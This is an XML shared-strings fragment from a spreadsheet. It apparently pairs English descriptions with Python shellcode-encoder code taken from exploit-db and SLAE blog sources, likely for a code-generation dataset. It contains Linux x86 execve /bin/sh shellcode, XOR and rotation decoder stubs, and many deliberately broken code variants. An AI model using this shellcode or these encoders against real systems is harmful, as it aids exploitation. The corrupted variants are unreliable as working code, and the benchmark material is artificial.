    <t>append strings "Encoded shellcode: ", P, encoded_shellcode, XOR_HEX, Y and W to Y, print it to the standard output</t>
  </si>
  <si>
    <t>bit = ( y + ROT ) % 256</t>
  </si>
  <si>
    <t>bit = byte &lt;&lt; nbits</t>
  </si>
  <si>
    <t>code = byte ^ XOR</t>
  </si>
  <si>
    <t>XOR = '%02x' % XOR</t>
  </si>
  <si>
    <t>format_slash_x is a string ""</t>
  </si>
  <si>
    <t>format_0x is a string ""</t>
  </si>
  <si>
    <t>counter is an integer 0</t>
  </si>
  <si>
    <t>max_bits is an integer 8</t>
  </si>
  <si>
    <t>offset is an integer 1</t>
  </si>
  <si>
    <t>subtract 1 from 2 raised to max_bits and assign the result to val1</t>
  </si>
  <si>
    <t>val2 is rbits modulo max_bits</t>
  </si>
  <si>
    <t>print string "Shellcode encryption started..." to the standard output</t>
  </si>
  <si>
    <t>increase counter by 1</t>
  </si>
  <si>
    <t>append counter converted to string to the string "[i] Counter: ", print it to the standard output</t>
  </si>
  <si>
    <t>append x converted to hexadecimal to the string "[i] Instruction in hex: ", print it to the standard output</t>
  </si>
  <si>
    <t>append x converted to string to the string "[i] Instruction in hex: ", print it to the standard output</t>
  </si>
  <si>
    <t>if counter modulo 2 is equal to 0</t>
  </si>
  <si>
    <t>print string "[i] EVEN index, therefore do ROR" to the standard output</t>
  </si>
  <si>
    <t>right shift by val2 the and operation between x and val1 and assign it to res1</t>
  </si>
  <si>
    <t>left shift x by max_bits minus val2 and assign the result to res2</t>
  </si>
  <si>
    <t>res2 is the result of the and operation between res2 and val1</t>
  </si>
  <si>
    <t>rox_encoded_instruction is the result of the or operation between res1 and res2</t>
  </si>
  <si>
    <t>print string "[i] ODD index therefore do ROL" to the standard output</t>
  </si>
  <si>
    <t>perform the and operation between x shifted left by val2 and val1 and assign the result to res1</t>
  </si>
  <si>
    <t>res2 is the result of the and operation between x and val1</t>
  </si>
  <si>
    <t>right shift res2 by max_bits minus val2</t>
  </si>
  <si>
    <t>encoded_instruction_in_hex is a string containing the hexadecimal conversion of rox_encoded_instruction</t>
  </si>
  <si>
    <t>append encoded_instruction_in_hex and string "\n" to string "[i] Encoded instruction in hex: ", print it to the standard output</t>
  </si>
  <si>
    <t>concatenate '0x' to the string format_0x</t>
  </si>
  <si>
    <t>append encoded_instruction_in_hex and string "," to format_0x</t>
  </si>
  <si>
    <t>print string "\n[+] Shellcode custom encoding done" to the standard output</t>
  </si>
  <si>
    <t>print string "\n[i] Initial shellcode length: %d" with %d replaced with len(bytearray(shellcode))</t>
  </si>
  <si>
    <t>length_format_0x is the count of "," in format_0x</t>
  </si>
  <si>
    <t>print string "[i] Encoded format 0x Length: %d" with %d replaced with length_format_0x</t>
  </si>
  <si>
    <t>append format_0x to string "[i] Encoded format 0x:\t", print it to the standard output</t>
  </si>
  <si>
    <t>if string "0x0," is in format_0x</t>
  </si>
  <si>
    <t>print string "\n[!] :( WARNING: Output shellcode contains NULL byte(s), consider re-encoding with different offset." to the standard output</t>
  </si>
  <si>
    <t>print string "\n[i] :) Good to go, no NULL bytes detected in output" to the standard output</t>
  </si>
  <si>
    <t>print string "\n[i] Done!" to the standard output</t>
  </si>
  <si>
    <t>format_slash_x = ''</t>
  </si>
  <si>
    <t>format_0x = ''</t>
  </si>
  <si>
    <t>counter = 0</t>
  </si>
  <si>
    <t>max_bits = 8</t>
  </si>
  <si>
    <t>offset = 1</t>
  </si>
  <si>
    <t>val1 = 2 ** max_bits - 1</t>
  </si>
  <si>
    <t>val2 = r_bits % max_bits</t>
  </si>
  <si>
    <t>counter += 1</t>
  </si>
  <si>
    <t>if counter % 2 == 0 :</t>
  </si>
  <si>
    <t>res1 = ( ( x &amp; val1 ) &gt;&gt; val2 )</t>
  </si>
  <si>
    <t>res2 = x &lt;&lt; ( max_bits - val2 )</t>
  </si>
  <si>
    <t>res2 = res2 &amp; val1</t>
  </si>
  <si>
    <t>rox_encoded_instruction = res1 | res2</t>
  </si>
  <si>
    <t>res1 = ( x &lt;&lt; val2 ) &amp; ( val1 )</t>
  </si>
  <si>
    <t>res2 = ( x &amp; val1 )</t>
  </si>
  <si>
    <t>res2 = res2 &gt;&gt; ( max_bits - val2 )</t>
  </si>
  <si>
    <t>encoded_instruction_in_hex = '%02x' % rox_encoded_instruction</t>
  </si>
  <si>
    <t>format_0x += '0x'</t>
  </si>
  <si>
    <t>format_0x += encoded_instruction_in_hex + ', '</t>
  </si>
  <si>
    <t>length_format_0x = format_0x . count ( ', ' )</t>
  </si>
  <si>
    <t>if '0x0, ' in format_0x :</t>
  </si>
  <si>
    <t>val2 = modulo % max_bits</t>
  </si>
  <si>
    <t>res1 = ( x &amp; val1 ) &gt;&gt; val2</t>
  </si>
  <si>
    <t>res2 = x &lt;&lt; max_bits - val2</t>
  </si>
  <si>
    <t>val1 = 2 - max_bits * 1</t>
  </si>
  <si>
    <t>val2 = rbits % modulo</t>
  </si>
  <si>
    <t>URL: https://www.exploit-db.com/shellcodes/37762</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>URL: https://www.exploit-db.com/shellcodes/37495</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>define shellcode as a tuple and add the string "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"</t>
  </si>
  <si>
    <t>shellcode = ( '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80' )</t>
  </si>
  <si>
    <t>encoded is the concatenation of the string "\\x", the hexadecimal value of the length of array of bytes of the variable shellcode and the string ','</t>
  </si>
  <si>
    <t>encoded = '\\x%02x, ' % len ( bytearray ( shellcode ) )</t>
  </si>
  <si>
    <t>encoded2 is the concatenation of the string "0x" with the hexadecimal conversion of the lenght of the array of bytes of shellcode</t>
  </si>
  <si>
    <t>encoded2 = '0x%02x, ' % len ( bytearray ( shellcode ) )</t>
  </si>
  <si>
    <t>print 'Encoded shellcode ...'</t>
  </si>
  <si>
    <t>loop x over the bytearray of the string shellcode</t>
  </si>
  <si>
    <t>for x in bytearray ( shellcode ) :</t>
  </si>
  <si>
    <t>if x is greater than 248</t>
  </si>
  <si>
    <t>if x &gt; 248 :</t>
  </si>
  <si>
    <t>append '\\x' to the string encoded</t>
  </si>
  <si>
    <t>append to the string encoded the value (7 - (256 -x)) converted to hexadecimal</t>
  </si>
  <si>
    <t>encoded += '%02x' % ( 7 - ( 256 - x ) )</t>
  </si>
  <si>
    <t>append '0x' to the string encoded2</t>
  </si>
  <si>
    <t>convert (7 -(256 - x)) to hexadecimal, concatenate the result with the string ',' and append it to the string encoded2</t>
  </si>
  <si>
    <t>encoded2 += '%02x, ' % ( 7 - ( 256 - x ) )</t>
  </si>
  <si>
    <t>convert (x+7) to hexadecimal and append it to the string encoded</t>
  </si>
  <si>
    <t>encoded += '%02x' % ( x + 7 )</t>
  </si>
  <si>
    <t>convert (x+7) to hexadecimal, concatenate the result with the string ',' and append it to the string encoded2</t>
  </si>
  <si>
    <t>encoded2 += '%02x, ' % ( x + 7 )</t>
  </si>
  <si>
    <t>return the length of array of bytes of the string shellcode</t>
  </si>
  <si>
    <t>len(bytearray(shellcode)))</t>
  </si>
  <si>
    <t>def shellcode('1ÀPh//shh/binã1ÉÊj_x000B_XÍ' + 1):</t>
  </si>
  <si>
    <t>'encoded = '\\x%02x, ' % len ( bytearray ( shellcode ) )'</t>
  </si>
  <si>
    <t>'encoded2 = '0x%02x, ' % len ( bytearray ( shellcode ) )'</t>
  </si>
  <si>
    <t>if x &gt; 255 :</t>
  </si>
  <si>
    <t>encoded2 += '\\x'</t>
  </si>
  <si>
    <t>'encoded2 += '%02x, ' % ( 7 - ( 256 - x ) )'</t>
  </si>
  <si>
    <t>'encoded2 += '%02x, ' % ( x + 7 )'</t>
  </si>
  <si>
    <t>return len ( shellcode )</t>
  </si>
  <si>
    <t>if x &gt; 128 :</t>
  </si>
  <si>
    <t>return len ( bytearray ( shellcode ) )</t>
  </si>
  <si>
    <t>URL: https://www.exploit-db.com/shellcodes/43758</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>declare the tuple shellcode containing the string "\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"</t>
  </si>
  <si>
    <t>shellcode = ( '\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' )</t>
  </si>
  <si>
    <t>encoded is an empty string</t>
  </si>
  <si>
    <t>encoded2 is an empty string</t>
  </si>
  <si>
    <t>iterate x over the array of bytes of the string shellcode</t>
  </si>
  <si>
    <t>check if x is greater than 248</t>
  </si>
  <si>
    <t>print encoded</t>
  </si>
  <si>
    <t>print encoded2</t>
  </si>
  <si>
    <t>print 'Len:' and length of the array of bytes of the shellcode string</t>
  </si>
  <si>
    <t>'shellcode = shellcode , '</t>
  </si>
  <si>
    <t>if x &gt; i :</t>
  </si>
  <si>
    <t>for x in bytearray ( shellcode ) :</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>URL: https://www.exploit-db.com/shellcodes/43751</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>shellcode is a tuple containing the string "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"</t>
  </si>
  <si>
    <t>encode is an empty string</t>
  </si>
  <si>
    <t>encode = ''</t>
  </si>
  <si>
    <t>check if x is less then 128</t>
  </si>
  <si>
    <t>left shift x by 1</t>
  </si>
  <si>
    <t>x = x &lt;&lt; 1</t>
  </si>
  <si>
    <t>append 0xAA to encode</t>
  </si>
  <si>
    <t>encode += '0xAA, '</t>
  </si>
  <si>
    <t>append 0x to encode</t>
  </si>
  <si>
    <t>encode += '0x'</t>
  </si>
  <si>
    <t>convert the value x in hexadecimal and append it to the string encode followed by ','</t>
  </si>
  <si>
    <t>encode += '%02x, ' % x</t>
  </si>
  <si>
    <t>print encode</t>
  </si>
  <si>
    <t>encoded += 0x</t>
  </si>
  <si>
    <t>URL: https://rastating.github.iolcreating-a-custom-shellcode-encoder/</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>import the package random</t>
  </si>
  <si>
    <t>import the package struct</t>
  </si>
  <si>
    <t>import struct</t>
  </si>
  <si>
    <t>import the package sys</t>
  </si>
  <si>
    <t>print nothing</t>
  </si>
  <si>
    <t>decoder_stub is the string '\x31\xc0\x31\xdb\x31\xc9\x31\xd2'</t>
  </si>
  <si>
    <t>decoder_stub = '\x31\xc0\x31\xdb\x31\xc9\x31\xd2'</t>
  </si>
  <si>
    <t>concatenate '\xb2\x45\xeb\x1f\x5e\x8d\x3e\x8a' to decoder_stub</t>
  </si>
  <si>
    <t>decoder_stub += '\xb2\x45\xeb\x1f\x5e\x8d\x3e\x8a'</t>
  </si>
  <si>
    <t>concatenate the string '\x1c\x0f\x88\xdf\x88\xd0\x30\xd8' to decoder_stub</t>
  </si>
  <si>
    <t>decoder_stub += '\x1c\x0f\x88\xdf\x88\xd0\x30\xd8'</t>
  </si>
  <si>
    <t>append the string '\x74\x16\x66\x8b\x44\x0f\x01\x66' to decoder_stub</t>
  </si>
  <si>
    <t>decoder_stub += '\x74\x16\x66\x8b\x44\x0f\x01\x66'</t>
  </si>
  <si>
    <t>append '\x31\xd8\x66\x89\x07\x41\x8d\x7f' to decoder_stub</t>
  </si>
  <si>
    <t>decoder_stub += '\x31\xd8\x66\x89\x07\x41\x8d\x7f'</t>
  </si>
  <si>
    <t>append '\x02\xeb\xe4\xe8\xdc\xff\xff\xff' to decoder_stub</t>
  </si>
  <si>
    <t>decoder_stub += '\x02\xeb\xe4\xe8\xdc\xff\xff\xff'</t>
  </si>
  <si>
    <t>define the function find_valid_xor_byte with input parameters bytes and bad_chars</t>
  </si>
  <si>
    <t>def find_valid_xor_byte ( bytes , bad_chars ) :</t>
  </si>
  <si>
    <t>iterate i over 255 random numbers between 1 and 256</t>
  </si>
  <si>
    <t>for i in random . sample ( range ( 1 , 256 ) , 255 ) :</t>
  </si>
  <si>
    <t>matched_a_byte is initialized to False</t>
  </si>
  <si>
    <t>matched_a_byte = False</t>
  </si>
  <si>
    <t>iterate bytes in list bad_chars</t>
  </si>
  <si>
    <t>for byte in bad_chars :</t>
  </si>
  <si>
    <t>convert the string byte to hex, then cast the result to int16 and then check if it is equal to i</t>
  </si>
  <si>
    <t>if i == int ( byte . encode ( 'hex' ) , 16 ) :</t>
  </si>
  <si>
    <t>matched_a_byte is True</t>
  </si>
  <si>
    <t>matched_a_byte = True</t>
  </si>
  <si>
    <t>break</t>
  </si>
  <si>
    <t>iterate byte in the list bytes</t>
  </si>
  <si>
    <t>for byte in bytes :</t>
  </si>
  <si>
    <t>convert to integer base 16 the string byte encoded to hex and check if it is equal to i</t>
  </si>
  <si>
    <t>exit from the iteration</t>
  </si>
  <si>
    <t>iterate bad_byte in bad_chars</t>
  </si>
  <si>
    <t>for bad_byte in bad_chars :</t>
  </si>
  <si>
    <t>val1 is the result of the bitwise xor between the integer base 16 of the string byte encoded to hex and i</t>
  </si>
  <si>
    <t>val1 = int ( byte . encode ( 'hex' ) , 16 ) ^ i</t>
  </si>
  <si>
    <t>check if the bytes object containing the value val1 xor i packed according to the format string unsigned char is equal to bad_byte</t>
  </si>
  <si>
    <t>if struct . pack ( 'B' , val1 ^ i ) == bad_byte :</t>
  </si>
  <si>
    <t>break the cycle</t>
  </si>
  <si>
    <t>if matched_a_byte is True</t>
  </si>
  <si>
    <t>if matched_a_byte :</t>
  </si>
  <si>
    <t>break the loop</t>
  </si>
  <si>
    <t>if matched_a_byte is not True</t>
  </si>
  <si>
    <t>if not matched_a_byte :</t>
  </si>
  <si>
    <t>return i</t>
  </si>
  <si>
    <t>if the number of arguments is lower than 2</t>
  </si>
  <si>
    <t>if len ( sys . argv ) &lt; 2 :</t>
  </si>
  <si>
    <t>print 'Usage: python {name} [shellcode] [optional: bad_chars]'.format(name = sys.argv[0])'</t>
  </si>
  <si>
    <t>terminate the program with exit code 1</t>
  </si>
  <si>
    <t>exit ( 1 )</t>
  </si>
  <si>
    <t>initialize bad_chars to the string '\x0a\x00\x0d'</t>
  </si>
  <si>
    <t>bad_chars = '\x0a\x00\x0d'</t>
  </si>
  <si>
    <t>if the number of arguments is higher than 2</t>
  </si>
  <si>
    <t>if len ( sys . argv ) &gt; 2 :</t>
  </si>
  <si>
    <t>remove '\\x' from the second argument, decode it in hexadecimal, and save in bad_chars</t>
  </si>
  <si>
    <t>bad_chars = sys . argv [ 2 ] . replace ( '\\x' , '' ) . decode ( 'hex' )</t>
  </si>
  <si>
    <t>shellcode is the first argument after removing string '\\x' decoded in hexadecimal</t>
  </si>
  <si>
    <t>shellcode = sys . argv [ 1 ] . replace ( '\\x' , '' ) . decode ( 'hex' )</t>
  </si>
  <si>
    <t>encoded is an empty list</t>
  </si>
  <si>
    <t>encoded = [ ]</t>
  </si>
  <si>
    <t>chunk_no is integer 0</t>
  </si>
  <si>
    <t>chunk_no = 0</t>
  </si>
  <si>
    <t>stub_has_bad_char is boolean False</t>
  </si>
  <si>
    <t>stub_has_bad_char = False</t>
  </si>
  <si>
    <t>iterate char over bad_chars</t>
  </si>
  <si>
    <t>for char in bad_chars :</t>
  </si>
  <si>
    <t>iterate byte in decoder_stub</t>
  </si>
  <si>
    <t>for byte in decoder_stub :</t>
  </si>
  <si>
    <t>if char is equal to byte</t>
  </si>
  <si>
    <t>if char == byte :</t>
  </si>
  <si>
    <t>stub_has_bad_char is boolean True</t>
  </si>
  <si>
    <t>stub_has_bad_char = True</t>
  </si>
  <si>
    <t>if stub_has_bad_char is True</t>
  </si>
  <si>
    <t>if stub_has_bad_char :</t>
  </si>
  <si>
    <t>print '\033[93m[!]\033[00m One or more bad chars were found in the decoder stub\n'</t>
  </si>
  <si>
    <t>while the length of shellcode is greater than integer 0</t>
  </si>
  <si>
    <t>while len ( shellcode ) &gt; 0 :</t>
  </si>
  <si>
    <t>add 1 to chunk_no</t>
  </si>
  <si>
    <t>chunk_no += 1</t>
  </si>
  <si>
    <t>assign 0 to xor_byte</t>
  </si>
  <si>
    <t>xor_byte = 0</t>
  </si>
  <si>
    <t>assign the first two elements of shellcode to chunk</t>
  </si>
  <si>
    <t>chunk = shellcode [ 0 : 2 ]</t>
  </si>
  <si>
    <t>xor_byte is the output of the function find_valid_xor_byte with the input parameters chunk and bad_chars</t>
  </si>
  <si>
    <t>if xor_byte is equal to 0</t>
  </si>
  <si>
    <t>if xor_byte == 0 :</t>
  </si>
  <si>
    <t>print 'Failed to find a valid XOR byte to encode chunk'</t>
  </si>
  <si>
    <t>terminate the program with exit code 2</t>
  </si>
  <si>
    <t>exit ( 2 )</t>
  </si>
  <si>
    <t>append to encoded a bytes object containing the value xor_byte packed according to the format string unsigned char</t>
  </si>
  <si>
    <t>encoded . append ( struct . pack ( 'B' , xor_byte ) )</t>
  </si>
  <si>
    <t>iterate i over a sequence of number from 0 to 2</t>
  </si>
  <si>
    <t>for i in range ( 0 , 2 ) :</t>
  </si>
  <si>
    <t>if i is lower than the length of chunk</t>
  </si>
  <si>
    <t>if i &lt; len ( chunk ) :</t>
  </si>
  <si>
    <t>val2 is the result of the bitwise xor between the integer base 16 of the element i of chunk encoded to hex and xor_byte</t>
  </si>
  <si>
    <t>val2 = int ( chunk [ i ] . encode ( 'hex' ) , 16 ) ^ xor_byte</t>
  </si>
  <si>
    <t>append to encoded a bytes object containing the value val1 packed according to the format string unsigned char</t>
  </si>
  <si>
    <t>encoded . append ( struct . pack ( 'B' , val1 ) )</t>
  </si>
  <si>
    <t>add to encoded a bytes object containing the value xor_byte packed according to the format string unsigned char</t>
  </si>
  <si>
    <t>remove the first 2 items from shellcode</t>
  </si>
  <si>
    <t>shellcode = shellcode [ 2 : : ]</t>
  </si>
  <si>
    <t>string1 contains a string concatenated with the elements of encoded separated by the value of decoder_stub</t>
  </si>
  <si>
    <t>string1 = decoder_stub . join ( encoded )</t>
  </si>
  <si>
    <t>xor_byte is the output of the function find_valid_xor_byte with the input parameters string1 and bad_chars</t>
  </si>
  <si>
    <t>print 'Failed to find a valid XOR byte for the delimiter'</t>
  </si>
  <si>
    <t>in decoder_stub replace '\x45' with bytes object containing the value xor_byte packed according to the format string unsigned char</t>
  </si>
  <si>
    <t>decoder_stub = decoder_stub . replace ( '\x45' , struct . pack ( 'B' , xor_byte ) )</t>
  </si>
  <si>
    <t>append to encoded the bytes object containing the value xor_byte packed according to the format string unsigned char</t>
  </si>
  <si>
    <t>iterate over bytes in decoder_stub</t>
  </si>
  <si>
    <t>concatenate in the string final_shellcode the concatenation of '\\x' and the string byte encoded in hexadecimal</t>
  </si>
  <si>
    <t>final_shellcode += '\\x' + byte . encode ( 'hex' )</t>
  </si>
  <si>
    <t>iterate over bytes in encoder</t>
  </si>
  <si>
    <t>for byte in encoder :</t>
  </si>
  <si>
    <t>print final_shellcode</t>
  </si>
  <si>
    <t>decoder_stub . append ( '\x31\xd8\x66\x89\x07\x41\x8d\x7f' )</t>
  </si>
  <si>
    <t>decoder_stub . append ( '\x02\xeb\xe4\xe8\xdc\xff\xff\xff' )</t>
  </si>
  <si>
    <t>'def find_valid_xor_byte ( bytes , i ) : '</t>
  </si>
  <si>
    <t>'for i in random . sample ( range ( 1 , 256 ) , 256 ) : '</t>
  </si>
  <si>
    <t>for byte in bad_chars ( bad_chars ) :</t>
  </si>
  <si>
    <t>if i == int ( byte . encode ( 'hex' ) ) :</t>
  </si>
  <si>
    <t>for byte in bytes ( bytes ) :</t>
  </si>
  <si>
    <t>'if i == int ( byte . encode ( 'hex' ) , 16 ) : '</t>
  </si>
  <si>
    <t>sys . exit ( )</t>
  </si>
  <si>
    <t>for y in bad_byte ( bad_chars ) :</t>
  </si>
  <si>
    <t>'val1 = int ( byte . encode ( 'hex' ) , 32 ) ^ i'</t>
  </si>
  <si>
    <t>'if struct . pack ( ' B' , val1 ^ i ) == bad_byte : '</t>
  </si>
  <si>
    <t>if matched_a_byte is True :</t>
  </si>
  <si>
    <t>if matched_a_byte is not True :</t>
  </si>
  <si>
    <t>bad_chars = int ( hex ( '\\x' ) . decode ( 2 ) )</t>
  </si>
  <si>
    <t>shellcode = '\\x' . decode ( 'hex' )</t>
  </si>
  <si>
    <t>if stub_has_bad_char is True :</t>
  </si>
  <si>
    <t>chunk = shellcode [ : 2 ]</t>
  </si>
  <si>
    <t>if xor_byte is 0 :</t>
  </si>
  <si>
    <t>'shellcode . append ( struct . pack ( ' B' , xor_byte ) )'</t>
  </si>
  <si>
    <t>'for i in range ( 0 , 2 ) : '</t>
  </si>
  <si>
    <t>'val2 = int ( chunk [ i ] . encode ( 'hex' ) , 32 ) ^ xor_byte'</t>
  </si>
  <si>
    <t>'shellcode . append ( struct . pack ( ' B' , val1 ) )'</t>
  </si>
  <si>
    <t>shellcode = shellcode [ 2 : ]</t>
  </si>
  <si>
    <t>string1 = '\n' . join ( encoded )</t>
  </si>
  <si>
    <t>'decoder_stub += struct . pack ( ' B' , byte . xor_byte )'</t>
  </si>
  <si>
    <t>for b in decoder_stub ( decoder_stub ) :</t>
  </si>
  <si>
    <t>final_shellcode += final_shellcode + '\\x' . encode ( 'hex' )</t>
  </si>
  <si>
    <t>var3 += '\x1c' % '\x1c\x0f\x88\xdf\x88\xd0\x30\xd8'</t>
  </si>
  <si>
    <t>decoder_stub += '®òÄÈ'</t>
  </si>
  <si>
    <t>for i in random . sample ( range ( 1 , 256 ) , 256 ) :</t>
  </si>
  <si>
    <t>for bytes in bad_chars :</t>
  </si>
  <si>
    <t>if int ( byte . encode ( 'hex' ) , 16 ) :</t>
  </si>
  <si>
    <t>for bad_byte in bad_charss :</t>
  </si>
  <si>
    <t>bad_chars = var1</t>
  </si>
  <si>
    <t>bad_chars = '\\x' . pop ( '\\x' ) . decode ( '\\x' )</t>
  </si>
  <si>
    <t>shellcode = [1.decode('\\x').encode('\\x')</t>
  </si>
  <si>
    <t>shellcode . append ( struct . pack ( 'B' , xor_byte ) )</t>
  </si>
  <si>
    <t>shellcode . append ( struct . pack ( 'B' , val1 ) )</t>
  </si>
  <si>
    <t>string1 = '%s%s' % encoded . join ( encoded )</t>
  </si>
  <si>
    <t>decoder_stub = struct . pack ( 'B' , xor_byte )</t>
  </si>
  <si>
    <t>for bytes in decoder_stub :</t>
  </si>
  <si>
    <t>for b in bytes in encoder :</t>
  </si>
  <si>
    <t>import the package binascii</t>
  </si>
  <si>
    <t>import binascii</t>
  </si>
  <si>
    <t>execve_shellcode is a bytearray of the byte string "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xb0\x0b\xcd\x80"</t>
  </si>
  <si>
    <t>execve_shellcode = bytearray ( b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xb0\x0b\xcd\x80' )</t>
  </si>
  <si>
    <t>check if the length of execve_shellcode is not even</t>
  </si>
  <si>
    <t>if ( len ( execve_shellcode ) % 2 ) != 0 :</t>
  </si>
  <si>
    <t>append 0x90 to execve_shellcode</t>
  </si>
  <si>
    <t>execve_shellcode . append ( 0x90 )</t>
  </si>
  <si>
    <t>execve_shellcode is a bytearray of execve_shellcode</t>
  </si>
  <si>
    <t>execve_shellcode = bytearray ( execve_shellcode )</t>
  </si>
  <si>
    <t>save the length of execve_shellcode into shellcode_len</t>
  </si>
  <si>
    <t>shellcode_len = len ( execve_shellcode )</t>
  </si>
  <si>
    <t>print "Shellcode Length:" and the value of shellcode_len</t>
  </si>
  <si>
    <t>orig is an empty list</t>
  </si>
  <si>
    <t>orig = [ ]</t>
  </si>
  <si>
    <t>swapped is an empty list</t>
  </si>
  <si>
    <t>swapped = [ ]</t>
  </si>
  <si>
    <t>x is 0</t>
  </si>
  <si>
    <t>x = 0</t>
  </si>
  <si>
    <t>loop over execve_shellcode</t>
  </si>
  <si>
    <t>for i in execve_shellcode :</t>
  </si>
  <si>
    <t>append i to orig</t>
  </si>
  <si>
    <t>orig . append ( i )</t>
  </si>
  <si>
    <t>while x is less than shellcode_len</t>
  </si>
  <si>
    <t>while x &lt; shellcode_len :</t>
  </si>
  <si>
    <t>append the element x + 1 of execve_shellcode to swapped</t>
  </si>
  <si>
    <t>swapped . append ( execve_shellcode [ x + 1 ] )</t>
  </si>
  <si>
    <t>append the element x of execve_shellcode to swapped</t>
  </si>
  <si>
    <t>swapped . append ( execve_shellcode [ x ] )</t>
  </si>
  <si>
    <t>increment x by 2</t>
  </si>
  <si>
    <t>x += 2</t>
  </si>
  <si>
    <t>print "[&gt;] Original shellcode:\n--------------------------"</t>
  </si>
  <si>
    <t>print the contents of orig</t>
  </si>
  <si>
    <t>print "\n[&gt;] Encoded Shellcode:\n--------------------------"</t>
  </si>
  <si>
    <t>print swapped</t>
  </si>
  <si>
    <t>swapped is the hexadecimal represenation of the array of bytes swapped</t>
  </si>
  <si>
    <t>swapped = binascii . hexlify ( bytearray ( swapped ) )</t>
  </si>
  <si>
    <t>add "0x" to every 2 characters of the string swapped</t>
  </si>
  <si>
    <t>swapped = '0x' + '0x' . join ( a + b for a , b in zip ( swapped [ : : 2 ] , swapped [ 1 : : 2 ] ) )</t>
  </si>
  <si>
    <t>separate every 4 characters of the string swapped with the separator ", "</t>
  </si>
  <si>
    <t>swapped = ', ' . join ( swapped [ i : i + 4 ] for i in range ( 0 , len ( swapped ) , 4 ) )</t>
  </si>
  <si>
    <t>print "\n[&gt;] Nasm:\n--------------------------\n{}" and the value of swapped</t>
  </si>
  <si>
    <t>if ( len ( execve_shellcode ) % 2  :</t>
  </si>
  <si>
    <t>execve_shellcode = executor . loader ( )</t>
  </si>
  <si>
    <t>swapped . append ( x + execve_shellcode )</t>
  </si>
  <si>
    <t>swapped += execve_shellcode [ x ]</t>
  </si>
  <si>
    <t>swapped = '%02x' % len ( bytearray ( b ) )</t>
  </si>
  <si>
    <t>'swapped = '0x' + '0x' . join ( a + b for a , b in zip ( swapped [ : : 2 ] , swapped [ 1 : : 2 ] ) )'</t>
  </si>
  <si>
    <t>'swapped = '.' . join ( swapped [ i : i + 4 ] for i in range ( 0 , len ( swapped ) , 4 ) )'</t>
  </si>
  <si>
    <t>for y in execve_shellcode :</t>
  </si>
  <si>
    <t>swapped += [ x + execve_shellcode ]</t>
  </si>
  <si>
    <t>swapped . append ( x )</t>
  </si>
  <si>
    <t>swapped = '%02x' % bytearray ( swapped )</t>
  </si>
  <si>
    <t>swapped = '.' . join ( swapped [ i : i + 4 ] for i in range ( 0 , len ( swapped ) , 4 ) )</t>
  </si>
  <si>
    <t>URL: https://snowscan.io/custom-encoder/#</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>URL: https://voidsec.com/slae-assignment-4-custom-shellcode-encoder/</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>import the package socket</t>
  </si>
  <si>
    <t>import socket</t>
  </si>
  <si>
    <t>initialize the variable decoder_stub to "\xeb\x57\x31\xc0\x31\xdb\x31\xc9"</t>
  </si>
  <si>
    <t>decoder_stub = '\xeb\x57\x31\xc0\x31\xdb\x31\xc9'</t>
  </si>
  <si>
    <t>add the string "\x31\xd2\x5e\xbf\x90\x90\xaa\xaa" to the variable decoder_stub</t>
  </si>
  <si>
    <t>decoder_stub += '\x31\xd2\x5e\xbf\x90\x90\xaa\xaa'</t>
  </si>
  <si>
    <t>add the string "\x83\xec\x7f\x83\xec\x7f\x83\xec" to the variable decoder_stub</t>
  </si>
  <si>
    <t>decoder_stub += '\x83\xec\x7f\x83\xec\x7f\x83\xec'</t>
  </si>
  <si>
    <t>add the string "\x7f\x83\xec\x7f\x8a\x5c\x16\x01" to the variable decoder_stub</t>
  </si>
  <si>
    <t>decoder_stub += '\x7f\x83\xec\x7f\x8a\x5c\x16\x01'</t>
  </si>
  <si>
    <t>add the string "\x8a\x7c\x16\x02\x8a\x4c\x16\x03" to the variable decoder_stub</t>
  </si>
  <si>
    <t>decoder_stub += '\x8a\x7c\x16\x02\x8a\x4c\x16\x03'</t>
  </si>
  <si>
    <t>add the string "\x8a\x6c\x16\x04\x32\x1c\x16\x32" to the variable decoder_stub</t>
  </si>
  <si>
    <t>decoder_stub += '\x8a\x6c\x16\x04\x32\x1c\x16\x32'</t>
  </si>
  <si>
    <t>add the string "\x3c\x16\x32\x0c\x16\x32\x2c\x16" to the variable decoder_stub</t>
  </si>
  <si>
    <t>decoder_stub += '\x3c\x16\x32\x0c\x16\x32\x2c\x16'</t>
  </si>
  <si>
    <t>add the string "\x88\x2c\x04\x88\x4c\x04\x01\x88" to the variable decoder_stub</t>
  </si>
  <si>
    <t>decoder_stub += '\x88\x2c\x04\x88\x4c\x04\x01\x88'</t>
  </si>
  <si>
    <t>add the string "\x7c\x04\x02\x88\x5c\x04\x03\x39" to the variable decoder_stub</t>
  </si>
  <si>
    <t>decoder_stub += '\x7c\x04\x02\x88\x5c\x04\x03\x39'</t>
  </si>
  <si>
    <t>add the string "\x7c\x16\x05\x74\x0a\x42\x42\x42" to the variable decoder_stub</t>
  </si>
  <si>
